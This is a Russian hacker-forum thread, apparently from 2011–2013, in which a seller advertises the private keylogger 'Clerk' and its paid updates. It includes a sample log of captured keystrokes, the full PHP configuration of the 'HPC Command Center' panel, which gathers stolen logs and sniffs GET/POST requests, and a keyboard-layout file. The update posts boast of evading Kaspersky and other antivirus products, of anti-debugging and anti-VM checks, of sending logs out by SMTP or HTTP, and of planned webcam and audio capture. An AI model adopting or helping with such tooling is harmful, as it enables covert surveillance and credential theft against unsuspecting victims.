1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Clerk 2.3 (приватный кейлогер)

Тема в разделе "Софт", создана пользователем 1nt, 29 авг 2011.

  1. 1nt
    1nt Новичок
    Симпатии:
    2
    Мелкий и шустрый кейлогер.

    Характеристики:

    Full
    Local
    Условия сделки:
    Оcобенности:
    Образец лога:
    Код:
    # Clerk 4.0.1 Log file
    [Windows Version: |Seven|]
    [Computer Name: |TestVM|]
    [Username: |TestUser|]
    
    [DATE: |11.09.2012| TIME: |21:43|]
    [WINDOW NAME: |Создать новую виртуальную машину|]
    [CURRENT PROCESS: |VirtualBox.exe|]
    USB[RSHIFT] 
    HPC Command Center

    [​IMG]

    В админ-панеле есть разделы Clerk и Sniffer. Так же есть страницы проверки новых записей со звуковым оповещением при постеплении новой записи. Сниффер мощный и гибкий.

    Файл config.php

    Код:
    <?php
    // HPC Command Center v.0.2
    // Coded by SokoL
    // HPC.name
    
    //////////////////////////////////////////////////////////
    // Данные для коннекта с DB
    $set['db_host'] = 'host';
    $set['db_user'] = 'user';
    $set['db_password'] = 'password';
    $set['db_name'] = 'db';
    //////////////////////////////////////////////////////////
    // Настройки принятия логов от Clerk
    
    $set['clerk_key'] = '12345'; // ваш ключ кейлоггера HPC Clerk
    $set['clerk_log_max_size'] = 64*1024; // максимальный размер загружаемого лога (в байтах), по дефолту 64кб
    $set['clerk_log_min_size'] = 1*1024; // минимальный размер загружаемого лога (в байтах), по дефолту 1кб
    $set['clerk_log_auto_del'] = 1; // автоматически удалять файл после загрузки. 1 - да, 0 - нет
    
    $clerk_rec_per_page = 10; // кол-во записей, отображаемых на 1 странице
    $clerk_del_on_one_page = 30; // сколько файлов удаляется при загрузке 1 страницы при выборе "удалить все файлы"
    $clerk_can_del_one_req = 100; // максимальное кол-во id, которое можно передать для удаления "за 1 присест" скрипту del_files.php
    $clerk_check_rec_time = 15; // время в секундах, которое по умолчанию ставится в форму при открытии скрипта check_clerk.php
    
    $clerk_mp3_name = 'play.mp3'; // имя mp3 файла, который воспроизводится на стр. check_clerk.php при поступлении новых записей (в каталоге статики)
    // обычно этот файл кэшируется, так что если заливаете новый поставьте новое имя
    $clerk_wait_if_new = 10; // сколько секунд оставляем страницу без перезагрузки если есть новая запись (при перезагрузке страницы воспроизведение аудио будет прервано)
    
    $clert_ban_ip_on = 0; // включить фильтр по ip и подсетям
    $arr_ip_ban_clerk[] = ''; // в этот массив можете добавлять ip (или подсети), с который запросы к gate.php будут игнорироваться
    
    //////////////////////////////////////////////////////////
    // Настройки сниффера
    $set['sniffer_on'] = 1; // включен ли сниффер (0 - нет, 1 - да). рекомендуем переименовать файл s.php
    
    $sniff_max_rec = 10000; // если в логе будет больше чем указанное кол-во записей, то будет выполнено действие в зависимости от переменной $sniff_max_rec_do (0 для отключния данной проверки)
    $sniff_max_rec_do = 0; // 0 - если кол-во записей превышает $sniff_max_rec то удалять самую старую запись, если 1 - прекращать запись в лог. 
    // внимание, если в базе уже записей больше чем $sniff_max_rec то записи все равно будут удаляться по одной на запрос
    
    $sniff_get_on = 1; // включить перехват GET запросов
    $sniff_post_on = 1; // включить перехват POST запросов
    $sniff_big_post_req = 1; // если POST запрос (key=value&key2=value2...) больше 2048 символов (utf8) он дописывается полностью в файл big_post. 
    //а в post query пишется уведомление об этом.
    $sniff_post_dir_max_size = 25*1024*1024; // если размер каталога post больше указанного (в байтах, по дефолту 25мб), запись файла с post запросом производиться не будет, и будет добавлено сообщ. об этом в файл errors
    $sniff_big_post_size = 100000; // ограничить запись POST запросов в каталог post определенным значенм длины символов (utf8, то есть 2 байта на символ). 0 для снятия ограничения.
    $sniff_post_force = 0; // принудительно писать все POST запросы в файлы
    $sniff_post_preview = 0; // кол-во символов, до которых обрезается строка POST запроса, ЕСЛИ он пишется в файл. 0 для того чтоб убрать строку. НЕ ставьте значение больше 2000
    $sniff_mp3_name = 'play_sniff.mp3'; // имя mp3 файла, который воспроизводится на стр. check_sniffer.php при поступлении новых записей (в каталоге статики)
    $sniff_wait_if_new = 35; // сколько секунд оставляем страницу без перезагрузки если есть новая запись (при перезагрузке страницы воспроизведение аудио будет прервано)
    
    $sniff_redirect = ''; // выполнять редирект на указанный url (пустое значения для отключения)
    
    $sniff_set_mime_type = 'image/gif'; // mime-тип, который выдавать при отправке изображения (не хочется нагружать расширением Exif или gd для автоматического определения)
    // Например: image/gif, image/jpeg, image/png, audio/wav, font/ttf, text/html, text/plain, application/octet-stream, application/javascript
    // Как видите может быть не только изображение.
    // Сам файл выдается из каталога send. Если там больше одного файла, файл выбирается рандомно. будьте осторожны, не загружайте в этот каталог файлы котоые не хотите выдать юзеру.
    
    $sniff_auto_mime = 1; // автоматическое определение mime-типа на основе расширения файла (см. массив в include/mime.php). если не будет найдено соответствие будет выдан mime тип $sniff_set_mime_type
    
    $sniff_write_ip = 1; // записывать ip в лог
    $sniff_write_ip_r = 0; // записывать HTTP_X_FORWARDED_FOR в лог
    $sniff_write_agent = 1; // записывать agent
    $sniff_write_ref = 1; // записывать ref
    
    $sniffer_rec_per_page = 10; // кол-во записей, отображаемых на 1 странице
    $sniffer_del_on_one_page = 30; // сколько записей удаляется при загрузке 1 страницы при выборе "удалить все файлы"
    $sniffer_can_del_one_req = 100; // максимальное кол-во id, которое можно передать для удаления "за 1 присест" скрипту del_records.php
    $sniffer_check_rec_time = 15; // время в секундах, которое по умолчанию ставится в форму при открытии скрипта check_sniffer.php
    
    $sniffer_download_dialog = 0; // 1 - выдавать диалог загрузки файла с post-запросом, 0 - отображать в браузере (mime-тип text/plain)
    $sniffer_post_charset = 'utf-8'; // кодировка, которая ставится в заголовок charset при выдаче post-файла
    
    $sniff_ip_filter_on = 0; // включить фильтр по ip
    $arr_sniff_ip_ban[] = ''; // в этот массив можете добавлять ip, с который запросы к снифферу будут игнорироваться
    $arr_sniff_ip_r_ban[] = ''; // в этот массив можете добавлять ip (HTTP_X_FORWARDED_FOR), с который запросы к снифферу будут игнорироваться.
    
    //////////////////////////////////////////////////////////
    // Некоторые общие настройки
    
    $set['gmt'] = '+0:00'; // смещение относительно GMT 0 (даты будут формироваться в соответствии с этим значением). соблюдайте именно этот формат (+/-NN:NN). значение по дефолту: +0:00
    
    $set['ip_check'] = 0; // разрешать запросы к панели только с определенного айпи. 0 - отключить, 1 - включить
    $arr_ip_check[] = ''; // массив в который можете добавлять айпи (или подсети) с которых разрешен доступ (только если включена опция $set['ip_check'])
    
    $set['internal_key'] = 'key'; // имя внутреннего ключа. внутренний ключ используется затруднения обнаружения панели. заходить в панель необходимо по адресу вида site.com/clerk.php?key=your_internal_key_here
    $set['internal_value'] = '12X3r4q5W'; // значение, которое необходимо чтоб было у этого ключа. используется для затруднения обнаружения панели. 
    // заходить в панель необходимо по адресу вида site.com/clerk.php?key=value где key это то что вы пропишете в $set['internal_key'] а value $set['internal_value']
    // Если ключ в GET запросе будет неправильный (речь идет не о всех скриптах) то вам будет выдан 404 error при запросе.
    
    $set['admin_login'] = 'admin'; // логин
    $set['admin_pass'] = 'password'; // пароль
    $set['password_md5'] = md5($set['admin_pass']);
    $set['admin_max_length'] = 100; // максимально допустимая длина вводимого пароля
    
    $set['panel_www_dir'] = ''; // www директория для панели, не ставьте / в конце, если заливаете в корень сайта оставьте значение ''
    $set['static_www_dir'] = '/static'; // www директория для static файлов, подключаемых со скриптов. не ставьте / в конце
    
    $set['domain_in_cookies'] = ''; // домен для кукисов, например .site.com для того чтобы куки читались на всех поддоменах данного домена. можете оставить поле пустым
    $set['path_in_cookies'] = '/'; // путь в кукисах... данные настройки кукисов не влияют на кукисы, которые ставятся JavaScript'ом
    
    $set['del_all_cookies'] = 0; // при logout'e удалять дополнительные куки, например hpc_cc_style
    
    // массив названия месяцев
    $arr_monthes = array(1 => 'Jan', 2 => 'Feb', 3 => 'March', 4 => 'Apr', 5 => 'May', 6 => 'June', 7 => 'July', 8 => 'Aug', 9 => 'Sep', 10 => 'Oct', 11 => 'Nov', 12 => 'Dec');
    
    ?>
    Как это работает?

    Кейлогер пишет файлы в лог и по достижению определенного размера отсылает их на гейт в админ-панеле. Оттуда логи и скачиваются, после чего специальное ПО обрабатывает лог файл с использованием собственных языковых конфигураций. Если найдены совпадения - ПО выводит лог на экран.
    Пример конфигурации для русского языка:

    Код:
    #CLR Charser file
    [main]
    # тип языка для вывода в утилиту
    lan=russian
    [characters]
    # системный нормер раскладки
    special_charset_number=68748313
    # параметр нажатой клавиши в формате:
    # клавиша=шифт зажат|шифт опущен
    1=1|!
    2=2|"
    3=3|№
    4=4|;
    5=5|%
    6=6|
    7=7|?
    8=8|*
    9=9|(
    0=0|)
    -=-|_
    +==|+
    Q=й|Й
    W=ц|Ц
    E=у|У
    R=к|К
    T=е|Е
    Y=н|Н
    U=г|Г
    I=ш|Ш
    O=щ|Щ
    P=з|З
    A=ф|Ф
    S=ы|Ы
    D=в|В
    F=а|А
    G=п|П
    H=р|Р
    J=о|О
    K=л|Л
    L=д|Д
    Z=я|Я
    X=ч|Ч
    C=с|С
    V=м|М
    B=и|И
    N=т|Т
    M=ь|Ь
    [=х|Х
    ]=ъ|Ъ
    \=\|/
    ;=ж|Ж
    '=э|Э
    ,=б|Б
    .=ю|Ю
    /=.|,
    Скриншот ПО для чтения логов:

    [​IMG]

    Индивидуальный функционал
    Код:
    Выйдите на связь и обговорим
    И помните что мы за легальное применение софта, т.е. за ваши действия/бездействия в связи с использованием данного софта, мы ответственности не несем.

    Связь с нами: 1nt: ПМ/Jabber - 1nt@jabber.org|1nt@xakery.ru.
    SokoL: ПМ/Email - hpcteam1@gmail.com
    Если у Вас другие способы связи - оставьте контакты в ПМ.

    Зеркало темы на HPC с отзывами
    Пройденная проверка на damagelab.org
     
    Последнее редактирование: 17 мар 2013
    29 авг 2011
    1 человеку нравится это.
  2. onthar
    onthar Команда форума Админ
    Симпатии:
    388
    Проверка пройдена.
    Действительно качественный развивающийся кейлоггер, отвечающий заявленным характеристикам. Автор отзывчивый, внятно отвечает на возникшие вопросы.
     
    29 авг 2011
  3. 1nt
    1nt Новичок
    Симпатии:
    2
    вверх!
     
    18 сен 2011
  4. 1nt
    1nt Новичок
    Симпатии:
    2
    ап.

    Обновление до версии 2.4.
    Код:
    1. Переработан движок, в виду чего уменьшен размер на ~20Кб.
    2. Удаление по дате (Full версия).
    3. Написан специальный антидот, который очистит компьютер от файла. 
    Больше никакой работы вручную.
     
    20 окт 2011
  5. 1nt
    1nt Новичок
    Симпатии:
    2
    ап, очередное обновление!

    Вместо отсылки на FTP теперь отправка на почту (SMTP-протокол).
    Изменился и размер ~29.5 кб.

    FTP отныне не поддерживается в виду дополнительных действий со стороны покупателя. С почтой все легче и удобнее.
     
    11 ноя 2011
  6. Zloi-antivirus
    Zloi-antivirus Новичок
    Симпатии:
    1
    1nt,
    Ответь и напиши мне в личку, не могу никуда достучаться. Ты куда потерялся?
     
    18 ноя 2011
  7. 1nt
    1nt Новичок
    Симпатии:
    2
    ап, обновление версии до 2.6. Снижение веса до 24.5 Кб. Оптимизирован алгоритм перехватчика, поправил баг с неправильным отображением часов в дате и определением х64-систем.

    Следующие два дня планирую заняться чисткой. Сразу хочу отметить, что Avira Security Suite детектирует только передачу данных, тоесть локальная версия будет без проблем работать на таких машинах.
     
    7 дек 2011
  8. Zloi-antivirus
    Zloi-antivirus Новичок
    Симпатии:
    1
    Придется писать в оффтопе, потому что ты 1nt видать только тут бываешь и не читаешь в личке и аське сообщения. Выйди на связь,это очень важно и срочно, не могу до тебя достучаться. А также сообщи свои дополнительные контактные данные(e-mail и т.д)
     
    20 дек 2011
  9. 1nt
    1nt Новичок
    Симпатии:
    2
    Zloi-antivirus, отписал в icq.
     
    20 дек 2011
    1 человеку нравится это.
  10. 1nt
    1nt Новичок
    Симпатии:
    2
    ап.

    Занимаюсь выпуском новой версии, тестирую отсылку.
    К сожалению, больше не занимаюсь продажей Lite-версии, как показала практика, она приносит больше головной боли, чем дохода. В продаже только Full/Local
     
    21 янв 2012
  11. 1nt
    1nt Новичок
    Симпатии:
    2
    ап
    Нововведения следующие:
    разделение темы писем на (новый лог и старый). Сответственно новые логи - посланные при первой же возможности, старые - успевшие полежать на пк, логи, которые не удалось отправить с первой попытки.
    Далее, в теме письма указывается время отсылки (время на пк во время отсылки). В письме вложенный файл вида ("маска"+"время создания".kg)
    Каждый старый лог приходит в отдельном письме, т.к. в зависимости от конфигурации файлов может быть много и они могут не вместиться в ограничитель почтового сервера.
    + в комплекте теперь идет скрипт получения логов из машины, если по какой-то причине письма с пк не отправляются, но есть физический доступ к пк.

    П.С. Текущая версия 2.9. Будет выпущен еще один апдейт, нецеленный на комортную работу с ПО + чистка автозапуска. В дальнейшем будет разработана версия 3.0 с использованием совершенно других алгоритмов. В виду этого бесплатно обновиться с версии 2.9 или ниже на 3.0 или выше не получится. Клиентy необходимо будет заплатить 25% от суммы продукта.
     
    31 янв 2012
  12. 1nt
    1nt Новичок
    Симпатии:
    2
    Вышло обновление. Из изменений мелкие вроде доработки движка, плюс теперь дата пишется в лог только если она изменяется (не пишется при изменении времени).
    Также почистил от касперского (теперь определяется как PDM.Invader но запуск не блочится, и софт работает как надо, дорабатываю, чтобы вообще не замечал). тестировал на версии 2012 с обновлениями.
    Хочу сообщить, что это последнее обновление ветки 2.х, поэтому кто не успеет обновиться бесплатно, при просьбе будет оплачивать 25%.
    Также прекратится тп для старых версий.
     
    10 фев 2012
  13. mansur007
    mansur007 Новичок
    Симпатии:
    0
    еще актуально? если да, огласите ценник плз. также интересует обнаружение данного продукта антивирусами касперского (особенно KIS 2012).
     
    11 апр 2012
  14. 1nt
    1nt Новичок
    Симпатии:
    2
    Работа над проектом возобновилась. Встречаем четвертую версию clerk.
    Нововведения:
    * Работа через php-гейт.
    * Передача и хранение логов на сервере в зашифрованном виде. В скриптах ключей нет.
    * Редактирование манифеста файла.
    * Некоторых огорчала невозможность вставки свой иконки. Теперь можно.

    Что осталось:
    * Все тулзы для ПО (антидот, быстрое копирование логов с машины, дешифратор логов). В ближайшее время помимо имеющихся файлов для скрытой работы напишу на MFC оконное приложение, которое будет включать в себя функционал всех тулз.
    * Пути установки, ключи в реестре
    * Безболезненная работа с UAC

    Что убрал:
    * Возможность отсылки логов по SMTP. Как показала статистика, чаще почтой пользуются неадекватные люди, чем те, с которыми бы дальше хотелось сотрудничать. Также надоедает борьба со спам-фильтрами.

    Цена остается прежней и увидеть ее можно из первого поста. Плюс предлагаю сотрудничество: приводите клиента - получаете 30% от дохода. Думаю хорошее предложение.
     
    12 сен 2012
  15. 1nt
    1nt Новичок
    Симпатии:
    2
    Ап. Добавлено:
    Код:
    Антиотладка
    Анти Virtual Box
    Анти VM Ware
     
    19 сен 2012
  16. 1nt
    1nt Новичок
    Симпатии:
    2
    ап. Долгожданное обновление.
    Доработан и обновлен движок кейлогера, теперь имеется возможность перехвата любой языковой раскладки, не только рус/англ.
    Также написана удобная утилита для просмотра логов в реальном времени, больше не нужен никакой дешифратор - утилита сделает все сама и покажет информацию в удобном виде.
    Подробности в первом посте

    При достаточно заметных нововведениях ценовая политика остается той же, право бесплатного обновления и тех.поддержки никто не отменял.
     
    12 дек 2012
  17. 1nt
    1nt Новичок
    Симпатии:
    2
    Ап. Проверил сегодня билд антивирусными сканерами на ВМ (все базы от 13.02.2013):
    Kaspersky AV 2013 - чист
    DR. Web 7.0 - чист
    NOD32 5 - чист
    AVG 2013 Free - чист
    Avast 7.0.1474 - чист
    Avira 13.0 - чист

    Также хотелось поделиться некоторыми задумками по дальнейшему развитию проекта. Во-первых, вернется версия с отправкой логов по SMTP/FTP (точно с протоколом не определились, но вероятнее сделаем SMTP, так как в этом случае пароль от почты-получателя не раскрывается, следовательно, не может быть перехвачен). Во-вторых, текущая Full версия, работающая на HTTP научится принимать команды от сервера. В-третьих, код уже переписывается на с++, что в будущем позволит легко подключать дополнительные модули/возможности. Очень хотелось бы видеть систему плагинов и/или SDK, но настолько далеко заглядывать еще рано. Что касается цен и лицензий, то будет 3 раличные версии: без отправки логов, отправка SMTP/FTP, админ панель + софт (упорядочены по возрастанию цены).
     
    Последнее редактирование: 14 фев 2013
    14 фев 2013
  18. 1nt
    1nt Новичок
    Симпатии:
    2
    Ап. Вышла версия для отсылки логов по SMTP.
    HTTP-версия все также актуальна по прежней цене. Плюс сейчас она дорабатывается: будет реализовано получение/выполнение команд от панели. Также планируется получать скрины веб-камеры/изображения с монитора, записывать звук (вход/выход). Полученные файлы будут отправляться вместе с логами как zip-архив. Отсылку всех этих файлов можно будет остановить/возобновить по команде. Для SMTP-версии будет ТОЛЬКО отсылка логов. Все, кто успеет купить по текущей цене будут обновлены без проблем (только после выхода новой верси напишите сами, т.к. контактов много, не упомнишь кто что брал).
     
    27 фев 2013
  19. 1nt
    1nt Новичок
    Симпатии:
    2
    Ап. Обновил софт для чтения логов
    Изменения:
    1. Регистронезависимый поиск по тексту
    2. Разворачивание на весь экран
    3. Возможность выбора отображения заголовков лога (заголовки окон, время, спец. клавиши, буфер обмена)
    Также мелкие фиксы (тильда не распознавалась, человекопонятные имена языковых конфигураций и т.д.) и улучшение производительности.

    [​IMG]
     
    17 мар 2013
  20. fuck_Anonim
    fuck_Anonim Новичок
    Симпатии:
    0
    Хочу приобрести вашу программу. Аська: 656891737, скайп: utlawzzz
     
    17 апр 2013

Поделиться этой страницей

Загрузка...